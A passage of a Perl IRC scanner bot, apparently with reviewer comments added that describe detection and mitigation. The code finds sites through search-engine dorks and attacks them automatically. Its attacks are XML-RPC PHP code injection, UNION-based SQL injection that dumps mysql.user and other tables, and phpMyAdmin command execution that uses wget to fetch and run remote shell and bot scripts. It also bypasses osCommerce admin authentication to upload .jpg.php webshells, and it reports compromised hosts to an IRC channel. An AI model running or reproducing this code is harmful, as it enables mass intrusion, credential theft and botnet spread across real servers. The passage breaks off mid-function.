  1727.         $exp .= "<value>".$rand7."<base64>')); $code exit;";
  1728.         $exp .= "</param></params>";
  1729.         $exp .= "</methodCall>";
  1730.        
        # length() counts characters; it equals the byte length only while
        # $exp holds no wide characters.
  1731. my $l = length($exp);
  1732. my $res = $userAgent->request(POST $url,Content_Type => $type,Content_Length => $l,Content => $exp);
  1733. return $res->content;
  1734. }
  1735. #-----------------------------------------------------
  1736. sub injxmlb() {
        # Variant of injxmla: same POST and return value, but the caller-supplied
        # $code is placed inside a <name> element nested in <value>, preceded by
        # "','')); " and followed by " exit;/*".
        # NOTE(review): the trailing "/*" presumably comments out whatever the
        # server-side code appends after the injected text; confirm.
        # Detection: <name> elements containing "'))" or "/*" in XML-RPC bodies.
  1737. my ($url,$code,$type) = @_;
  1738. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1739. $userAgent->timeout(20);
  1740.  
  1741.         $exp = "<?xml version=\"1.0\"?>";
  1742.         $exp .= "<methodCall>";
  1743.         $exp .= "<methodName>".$rand2."</methodName>";
  1744.         $exp .= "<params><param>";
  1745.         $exp .= "<value>".$rand3."<name>".$rand4."','')); $code exit;/*</name></value>";
  1746.         $exp .= "</param></params>";
  1747.         $exp .= "</methodCall>";
  1748.  
  1749. my $l = length($exp);
  1750. my $res = $userAgent->request(POST $url,Content_Type => $type,Content_Length => $l,Content => $exp);
  1751. return $res->content;
  1752. }
  1753. #-----------------------------------------------------
  1754. sub injxmlc() {
        # Variant of injxmla: the caller-supplied $code sits in a <name> element
        # that is a direct child of <param>, preceded by "'); " and followed by
        # " exit;//". No explicit Content_Length is passed here.
        # Returns the response body.
        # Detection: a <name> element directly under <param> is not valid
        # XML-RPC; schema-validating the request body rejects this shape.
  1755. my ($url,$code,$type) = @_;
  1756. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1757. $userAgent->timeout(20);
  1758.  
  1759.     $exp = "<?xml version=\"1.0\"?>";
  1760.     $exp .= "<methodCall>";
  1761.     $exp .= "<methodName>".$rand5."</methodName>";
  1762.     $exp .= "<params><param>";
  1763.     $exp .= "<name>".$rand6."'); $code exit;//</name>";
  1764.     $exp .= "<value>".$rand7."</value>";
  1765.     $exp .= "</param></params>";
  1766.     $exp .= "</methodCall>";
  1767.        
  1768. my $res = $userAgent->request(POST $url,Content_Type => $type,Content => $exp);
  1769. return $res->content;
  1770. }
  1771. #-----------------------------------------------------
  1772. sub injxmld() {
        # Variant of injxmla with five <param> entries: four carry the string
        # value "1" and the fifth carries the caller-supplied $code inside a
        # <name> element, preceded by "','')); " and followed by " die; /*".
        # Returns the response body.
        # Detection: the same "'))" / "/*" markers as the other injxml* subs,
        # here in the fifth parameter of the call.
  1773. my ($url,$code,$type) = @_;
  1774. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1775. $userAgent->timeout(20);
  1776.  
  1777.         $exp = "<?xml version=\"1.0\"?>";
  1778.         $exp .= "<methodCall>";
  1779.         $exp .= "<methodName>".$rand8."</methodName>";
  1780.         $exp .= "<params><param>";
  1781.         $exp .= "<value><string>1</string></value>";
  1782.         $exp .= "</param><param>";
  1783.         $exp .= "<value><string>1</string></value>";
  1784.         $exp .= "</param><param>";
  1785.         $exp .= "<value><string>1</string></value>";
  1786.         $exp .= "</param><param>";
  1787.         $exp .= "<value><string>1</string></value>";
  1788.         $exp .= "</param><param>";
  1789.         $exp .= "<value>".$rand9."<name>".$rand10."','')); $code die; /*</name></value>";
  1790.         $exp .= "</param></params>";
  1791.         $exp .= "</methodCall>";
  1792.  
  1793. my $res = $userAgent->request(POST $url,Content_Type => $type,Content => $exp);
  1794. return $res->content;
  1795. }
  1796. ######################## SQL
  1797. sub sql() {
        # For every host returned by search_engine(), requests $site.$bug with a
        # single quote appended and classifies the response by database error
        # text (MySQL, MS SQL Server, Access/JET, Oracle OLE DB, PHP mysql_*).
        # A match hands the unquoted URL to sqlbrute(); the MS SQL and Access
        # branches also announce the host on $chan first.
        # Each host is processed in a double-forked grandchild, so the parent
        # loop only waits for the short-lived first child.
        # Mitigation: parameterised queries, and never returning raw database
        # error messages to clients; the matched strings below are exactly what
        # an error-disclosure review should look for in responses.
  1798.         my ($chan,$bug,$dork,$engine) = @_;
  1799.     my $count = 0;
  1800.     my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  1801.     my $num = scalar(@list);
  1802.     if ($num > 0) {
  1803.         foreach my $site (@list) {
  1804.             $count++;
  1805.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$sqllogo 12(4@0$engine12) 7==14F7=15I7=0N7=0I7=14S7=14H7== "); } }
  1806.             my $test = "http://".$site.$bug."'";
  1807.             my $vuln = "http://".$site."12".$bug;
  1808.                         my $sqlsite = "http://".$site.$bug;
  1809.             my $html = &get_content($test);
  1810.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1811.             if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  1812.                 &sqlbrute($sqlsite,$chan,$engine);}
  1813.             elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  1814.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsSQL15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1815.             elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  1816.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsAccess15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1817.             elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  1818.                 &sqlbrute($sqlsite,$chan,$engine);}
  1819.             } exit; sleep(2); }
  1820.         }
  1821.     }
  1822. }
  1823. sub sqlbrute() {
        # Sends a series of UNION SELECT requests against $situs, growing the
        # column list from 1 to 45 entries. Every column carries the hex literal
        # 0x6c6f67696e70776e7a, and a response containing "loginpwnz" (the text
        # that literal decodes to) is treated as confirmation. After the first
        # confirmation it repeats the probe against information_schema.tables,
        # mysql.user, a load_file() expression and every name in @tabele
        # (defined outside this block), reporting each hit on $chan and passing
        # confirmed table names to tabelka().
        # $union, $inyection, $sql, $response, $loadfile and $loadcont are
        # package globals, not lexicals of this sub.
        # Detection: query strings containing "-1+union+select+" together with
        # the hex marker above, or "loginpwnz" in response bodies.
        # Mitigation: parameterised queries; a database account without FILE
        # privilege and without read access to mysql.user limits what these
        # probes can return.
  1824.                         my ($situs,$chan,$engine) = @_;
  1825.                         my $columns=45;
  1826. my $cfin.="--";
  1827. my $cmn.= "+";
  1828. for ($column = 0 ; $column < $columns ; $column ++)
  1829.         {
  1830.         $union.=','.$column;
  1831.         $inyection.=','."0x6c6f67696e70776e7a";
  1832.     if ($column == 0)
  1833.       {
  1834.                   $inyection = '';
  1835.           $union = '';
  1836.       }
  1837.     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  1838.     $response=get($sql);
  1839.     if($response =~ /loginpwnz/)
  1840.                 {
  1841.          $column ++;
  1842.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  1843.                  &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)3 $sql  ");
  1844.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  1845.          $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  1846.          if($response =~ /loginpwnz/)
  1847.                 {
  1848.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  1849.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14INFO_SCHEMA15)3 $sql  ");
  1850.                 }
  1851.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  1852.          $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  1853.          if($response =~ /loginpwnz/)
  1854.                 {
  1855.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  1856.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14USER15)3 $sql  ");
  1857.                 }
  1858.          else
  1859.                 {
  1860.                 }
                # The hex argument to load_file() below decodes to a
                # /proc/self/environ path followed by a PHP include() of a
                # remote pbot.txt URL; the response is then checked for "apache".
  1861.         while ($loadcont < $column-1)
  1862.            {
  1863.                 $loadfile.=','.'load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)';
  1864.                 $loadcont++;
  1865.            }
  1866.            $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)".$loadfile.$cfin;
  1867.           $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  1868.          if($response =~ /apache/)
  1869.                 {
  1870.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Load File15)3 $sql  ");
  1871.                         }
  1872.          else
  1873.                 {
  1874.                 }
  1875.                   foreach $tabla(@tabele)
  1876.                 {
  1877.                   chomp($tabla);
  1878.                   $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1879.                                  $response=get($sql)or die("[-] Impossible to get tables\n");
  1880.                   if($response =~ /loginpwnz/)
  1881.                     {
  1882.                     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  1883.                                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Tabel15)3 $sql  ");
  1884.                                         &tabelka($situs,$tabla,$chan,$engine);
  1885.                     }
  1886.                 }
  1887.                 }
  1888.         }                      
  1889. }
  1890.  
  1891. sub tabelka() {
        # For one table name, iterates the column names in @kolumny (defined
        # outside this block) and requests a UNION SELECT of
        # concat(<marker>,0x3a,<column>) from that table. A response containing
        # "loginpwnz" is reported on $chan with the site, column and table.
        # $inyection is the package global left behind by sqlbrute().
        # Detection: "concat(0x6c6f67696e70776e7a,0x3a," in request URLs.
  1892.                         my ($situs,$tabla,$chan,$engine) = @_;
  1893.                         my $cfin.="--";
  1894.                         my $cmn.= "+";
  1895.             chomp($tabla);
  1896.             foreach $columna(@kolumny)
  1897.             {
  1898.              chomp($columna);
  1899.              $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1900.              $response=get($sql)or die("[-] Impossible to get columns\n");
  1901.              if ($response =~ /loginpwnz/)
  1902.                 {
  1903.                                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(7@14SQLi Vuln14)3 $situs 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla  ");
  1904.                 }
  1905.             }
  1906.        
  1907. }
  1908.  
  1909. ######################## Cpanel
  1910. sub cpanel() {
        # For every host returned by search_engine(), fetches
        # admin/content.php?act=tambahuser and reports the host on $chan when the
        # response contains the "nama_lengkap" text input of that form.
        # $test is assigned but not used in this block.
        # NOTE(review): the check implies the add-user form is being served to
        # an unauthenticated client; confirm against the affected application.
        # Mitigation: enforce authentication on every admin/ script server-side.
  1911.         my ($chan,$bug,$dork,$engine) = @_;
  1912.     my $count = 0;
  1913.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1914.     my $num = scalar(@list);
  1915.     if ($num > 0) {
  1916.         foreach my $site (@list) {
  1917.             $count++;
  1918.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1919.             my $test = "http://".$site.$bug;
  1920.                         my $zine = "http://".$site."admin/content.php?act=tambahuser";
  1921.             my $re    = &get_content($zine);
  1922.            if ($re =~ /<input type=text name=nama_lengkap size=30>/i ){
  1923.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1924.             }
  1925.                 }
  1926.     }
  1927. }
  1928. sub cpanel2() {
        # Same loop as cpanel(), but fetches admin/content.php?module=user and
        # matches on the "Tambah User" submit button instead.
        # $test is assigned but not used in this block.
        # Detection: unauthenticated GETs to admin/content.php with
        # act=tambahuser or module=user from search-engine-driven scanners.
  1929.         my ($chan,$bug,$dork,$engine) = @_;
  1930.     my $count = 0;     
  1931.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1932.     my $num = scalar(@list);
  1933.     if ($num > 0) {
  1934.         foreach my $site (@list) {
  1935.             $count++;
  1936.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1937.             my $test = "http://".$site.$bug;
  1938.                         my $zine = "http://".$site."admin/content.php?module=user";
  1939.             my $re    = &get_content($zine);
  1940.            if ($re =~ /<input type=submit value='Tambah User'>/i ){
  1941.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1942.             }
  1943.                 }
  1944.     }
  1945. }
  1946.  
  1947. ######################## PHPmyadmin
  1948. sub adm() {
        # For every host returned by search_engine(), requests
        # <dir>/config/config.inc.php with a "c" query parameter under a fixed
        # list of database-admin directory names, stopping at the first response
        # that matches $adm_output (defined outside this block) and passing that
        # path to adm_xpl(). The "c" value is a URL-encoded shell command line
        # that echoes a marker, runs id and fetches sh.txt from $injurl.
        # NOTE(review): this only works where config.inc.php already executes
        # its "c" parameter, i.e. presumably a file previously written through
        # a setup-script flaw; confirm against the relevant phpMyAdmin advisory.
        # Detection: any request to */config/config.inc.php carrying a query
        # string, especially with ";" or "wget" in it.
        # Mitigation: remove the setup/config directories after installation
        # and deny direct HTTP access to config.inc.php.
  1949.         my ($chan,$bug,$dork,$engine) = @_;
  1950.     my $count = 0;
  1951.     my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
  1952.     my $num = scalar(@list);
  1953.     if ($num > 0) {
  1954.         foreach my $site (@list) {
  1955.             $count++;
  1956.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$admlogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1957.            
  1958.                         if(get_content("http://".$site."phpMyAdmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1959.                         elsif(get_content("http://".$site."phpmyadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmyadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1960.                         elsif(get_content("http://".$site."PHPMYADMIN/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "PHPMYADMIN/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1961.                         elsif(get_content("http://".$site."PMA/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "PMA/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1962.                         elsif(get_content("http://".$site."pma/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "pma/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1963.                         elsif(get_content("http://".$site."admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1964.                         elsif(get_content("http://".$site."dbadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "dbadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1965.                         elsif(get_content("http://".$site."mysql/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysql/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1966.                         elsif(get_content("http://".$site."myadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "myadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1967.                         elsif(get_content("http://".$site."phpmyadmin2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmyadmin2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1968.                         elsif(get_content("http://".$site."phpMyAdmin2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1969.                         elsif(get_content("http://".$site."phpMyAdmin-2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin-2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1970.                         elsif(get_content("http://".$site."php-my-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "php-my-admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1971.                         elsif(get_content("http://".$site."sqlmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "sqlmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1972.                         elsif(get_content("http://".$site."mysqlmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysqlmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1973.                         elsif(get_content("http://".$site."phpmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1974.                         elsif(get_content("http://".$site."php-myadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "php-myadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1975.                         elsif(get_content("http://".$site."phpmy-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmy-admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1976.                         elsif(get_content("http://".$site."webadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1977.                         elsif(get_content("http://".$site."sqlweb/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "sqlweb/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1978.                         elsif(get_content("http://".$site."phppgadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phppgadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1979.                         elsif(get_content("http://".$site."websql/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "websql/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1980.                         elsif(get_content("http://".$site."webdb/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webdb/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1981.                         elsif(get_content("http://".$site."mysqladmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysqladmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1982.                         elsif(get_content("http://".$site."mysql-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webmail/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1983.                 }
  1984.     }
  1985. }
  1986.  
  1987. sub adm_xpl() {
        # Follow-up for a path that adm() matched. In a double-forked grandchild
        # it assigns $exvln (a URL whose "c" parameter changes to /tmp, fetches
        # pbot.txt from $injurl as pb.php and runs it with php), announces the
        # host and path on $chan, then fetches h4rd.php from the site root and
        # calls info_main() when the "ID: 0wn3d" marker markup is present.
        # Detection: pb.php appearing under /tmp, php processes started by the
        # web-server user from /tmp, and outbound fetches of pbot.txt.
        # Mitigation: mount /tmp noexec where feasible and restrict outbound
        # HTTP from web-server accounts.
  1988.   my ($vuln,$chan,$site,$engine) = @_;
  1989.   if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1990.         my $exvln = "http://".$site.$vuln."?c=id;cd%20/tmp/;wget%20".$injurl."/pbot.txt%20-O%20pb.php;php%20pb.php";
  1991.         &msg("$chan", "$admlogo 12(4@0$engine12)(4@12VulN12)12 http://".$site.$vuln."10?c=[CMD] 12(4@0OKEE12)");
  1992.         if (get_content("http://".$site."h4rd.php") =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1993.         &info_main($dor,$chan,$engine,$rfilogo);
  1994.         }
  1995.   } exit; sleep(2); }
  1996. }
  1997. ######################## OSCO
  1998. sub oscommerce() {
        # For every host returned by search_engine(), calls osco_1/2/3 with three
        # admin script paths (categories.php, file_manager.php,
        # banner_manager.php), each suffixed with "/login.php".
        # NOTE(review): the "/login.php" path-info suffix presumably makes the
        # application's login check treat the request as the login page;
        # confirm against the osCommerce advisory for the affected versions.
        # Detection: requests matching admin/<script>.php/login.php.
        # Mitigation: rename or IP-restrict admin/, add HTTP authentication in
        # front of it, and upgrade to a release that fixes the path check.
  1999.         my ($chan,$bug,$dork,$engine) = @_;
  2000.     my $count = 0;
  2001.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  2002.     my $num = scalar(@list);
  2003.     if ($num > 0) {
  2004.         foreach my $site (@list) {
  2005.             $count++;
  2006.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  2007.                         my $bug0 = "admin/categories.php/login.php";
  2008.                         my $bug1 = "admin/file_manager.php/login.php";
  2009.             my $bug2 = "admin/banner_manager.php/login.php";
  2010.  
  2011.                         &osco_1($site,$chan,$bug0,$engine);
  2012.                         &osco_2($site,$chan,$bug1,$engine);
  2013.                         &osco_3($site,$chan,$bug2,$engine);
  2014.  
  2015.                 }
  2016.         }
  2017. }
  2018.                                
  2019. sub osco_1() {
        # Fetches $site.$bug and, in a double-forked grandchild, treats the
        # presence of "TABLE_HEADING_CATEGORIES_PRODUCTS" in the response as
        # proof that the admin categories page rendered without a session.
        # On a match it optionally announces the URL ($conf{soscos}), then calls
        # osco_xpl1() and osql().
        # Detection: a 200 response containing that untranslated language
        # constant to a client with no admin session cookie.
  2020.         my ($site,$chan,$bug,$engine) = @_;
  2021.     my $test = "http://".$site.$bug;
  2022.     my $html = &get_content($test);
  2023.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2024.                 if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
  2025.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2026.                         &osco_xpl1($test,$chan,$site,$engine);
  2027.                         &osql($chan,$site,$engine);
  2028.                 }
  2029.         } exit; sleep(2); }
  2030. }
  2031.  
  2032.  
  2033. sub osco_xpl1() {
        # Sends four multipart form POSTs to $url?cPath=&action=new_product_preview,
        # each uploading a local file (./sh.jpg or ./pbot.jpg) in the
        # "products_image" field under a server-side name ending in ".jpg.php",
        # including "../" and "banners/" prefixed names. Successful responses
        # lead to osco_shell_check(), or to direct requests for pb.jpg.php.
        # The second "my $url" re-declares the parameter with the query appended.
        # Detection: multipart uploads whose filename has a double extension
        # ending in .php, or contains "../", posted to admin scripts.
        # Mitigation: validate and regenerate upload filenames server-side and
        # disable script execution in images/ and banners/.
  2034. my ($url,$chan,$site,$engine) = @_;
  2035. my $browser = LWP::UserAgent->new;
  2036. my $url    = $url."?cPath=&action=new_product_preview";
  2037. my $res = $browser->post( $url,['products_image' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2038. my $resa = $browser->post( $url,['products_image' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2039. my $resb = $browser->post( $url,['products_image' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2040. my $resc = $browser->post( $url,['products_image' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2041.  
  2042.         if ($res->is_success()) {
  2043.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2044.                 &osco_shell_check($url,$chan,$site,$engine);  
  2045.         }
  2046.         if ($resa->is_success()) {
  2047.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2048.         }
  2049.         if ($resb->is_success()) {
  2050.                 &osco_shell_check($url,$chan,$site,$engine);
  2051.         }
  2052.         if ($resc->is_success()) {
  2053.                 &osco_shell_check($url,$chan,$site,$engine);
  2054.         }
  2055. }
  2056.  
  2057. sub osco_2() {
        # Same shape as osco_1(), for the file-manager page: the response must
        # contain "TABLE_HEADING_FILENAME" before osco_xpl2() and osql() are
        # called from the double-forked grandchild.
        # Detection: admin/file_manager.php/login.php requests answered with 200.
  2058.         my ($site,$chan,$bug,$engine) = @_;
  2059.     my $test = "http://".$site.$bug;
  2060.     my $html = &get_content($test);
  2061.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2062.         if ($html =~ /TABLE_HEADING_FILENAME/) {
  2063.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2064.                         &osco_xpl2($test,$chan,$site,$engine);
  2065.             &osql($chan,$site,$engine);
  2066.                 }
  2067.     } exit; sleep(2); }
  2068. }
  2069.  
  2070. sub osco_xpl2() {
        # Same four uploads as osco_xpl1(), sent to $url?action=processuploads
        # in the "file_1" form field; the follow-up checks are identical.
        # Detection: POSTs to file_manager.php with action=processuploads and a
        # ".jpg.php" filename in the multipart body.
        # Mitigation: remove file_manager.php where it is not needed and block
        # script execution in upload targets.
  2071. my ($url,$chan,$site,$engine) = @_;
  2072. my $browser = LWP::UserAgent->new;
  2073. my $url    = $url."?action=processuploads";
  2074. my $res = $browser->post( $url,['file_1' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2075. my $resa = $browser->post( $url,['file_1' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2076. my $resb = $browser->post( $url,['file_1' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2077. my $resc = $browser->post( $url,['file_1' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2078.  
  2079.         if ($res->is_success()) {
  2080.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2081.                 &osco_shell_check($url,$chan,$site,$engine);
  2082.         }
  2083.         if ($resa->is_success()) {
  2084.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2085.         }
  2086.         if ($resb->is_success()) {
